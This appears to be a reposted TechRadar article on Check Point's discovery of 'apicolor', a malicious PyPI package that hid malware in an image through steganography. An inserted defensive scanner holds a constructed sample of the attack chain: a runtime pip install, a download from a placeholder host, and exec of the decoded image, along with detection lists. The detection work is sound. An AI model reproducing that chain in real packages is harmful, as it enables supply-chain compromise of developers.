This random image is spreading a malicious PyPI package using GitHub


Cybersecurity researchers from Check Point Research (CPR) have discovered a new malicious package on PyPI, the code repository for the Python programming language. The package uses an image to deliver Trojan malware, largely using GitHub.

The threat actors behind this new campaign hope that while searching the web for legitimate projects, Python developers will, sooner or later, come across ‘apicolor’. 

The seemingly benign in-development package on PyPI, once installed, first manually installs extra requirements and then downloads a picture from the web. The extra requirements process the picture, and the output generated by that processing is then run using the exec command.

Steganography attack

One of those two requirements is the judyb code, which is in fact a steganography module capable of revealing hidden messages within pictures. That led the researchers back to the picture, which, as it turns out, downloads malicious packages from the web to the victim's endpoint.
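A defender-side static check for the chain described above (requirements installed at runtime, a file downloaded from the web, and the decoded output passed to exec), added here as an example and not taken from CPR's tooling or from the package itself. The sample source, its module name and its URL are constructed and hypothetical, and the sample is only parsed, never run.

```python
import ast

# Constructed sample of the install-time pattern described above; it is only
# parsed here, never executed. Module name and URL are hypothetical.
SAMPLE_SETUP = '''
import os
import requests
os.system("pip install hypothetical_stego_pkg")
from hypothetical_stego_pkg import reveal
data = requests.get("https://example.invalid/pic.png").content
open("pic.png", "wb").write(data)
exec(reveal("pic.png"))
'''

INSTALL_RUNNERS = {"os.system", "subprocess.run", "subprocess.call", "subprocess.check_call"}
DOWNLOADERS = {"requests.get", "urllib.request.urlopen", "urllib.request.urlretrieve"}

def dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, else an empty string."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""

def scan_source(source):
    """Return sorted (line, finding) tuples for the three behaviours."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        name = dotted_name(node.func)
        # All string literals in the call, so list-form commands are covered too.
        joined = " ".join(c.value for c in ast.walk(node)
                          if isinstance(c, ast.Constant) and isinstance(c.value, str))
        if name in INSTALL_RUNNERS and "pip" in joined and "install" in joined:
            findings.append((node.lineno, "runtime-pip-install"))
        elif name in DOWNLOADERS:
            findings.append((node.lineno, "network-download"))
        elif name in {"exec", "eval"} and node.args and not isinstance(node.args[0], ast.Constant):
            findings.append((node.lineno, "exec-of-computed-value"))
    return sorted(findings)

def is_suspicious(source):
    """Flag only when a download and an exec of computed data appear together."""
    kinds = {kind for _, kind in scan_source(source)}
    return {"network-download", "exec-of-computed-value"} <= kinds
```

The check is a triage heuristic: aliased imports or indirect calls will evade it, so a hit is a reason to read the package source before installing, not a verdict.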

Malicious image

(Image credit: Check Point Research)

“The immediate place to investigate such packages is GitHub,” the researchers explain. “Researchers searched for code projects using these packages, enabling the team to further understand their infection techniques (if anyone mistakenly installed them and if they did, how it happened). Using this search, it became apparent that apicolor and judyb are quite niche, having low usage on GitHub projects.”

As soon as CPR notified PyPI of its findings, the latter removed the malicious package from its platform.

While the researchers did not find out who the threat actor behind this campaign was, they did say that the whole ordeal was “carefully planned and thought”, further stating that the obfuscation techniques on PyPI have evolved.

“We constantly scan PyPI for malicious packages and responsibly report them to PyPI. This one is unique and distinct from almost all the malicious packages we have encountered before,” commented Ori Abramovsky, Head of Data Science, SpectralOps, a Check Point company.

“This package differs in the way it camouflages its intent, and the way in which it targets PyPI users to infect them with malicious imports on GitHub. Our findings indicate that PyPI malicious packages and their obfuscation techniques are fast-evolving. The package we have shared here reflects careful and meticulous work. It is not the regular copy and paste that we commonly see, but what seems like a real campaign. The creation of the GitHub projects, then smartly hiding the code and downplaying the packages on PyPI, are all sophisticated work.”



from TechRadar - All the latest technology news https://ift.tt/zdS5aOn
via IFTTT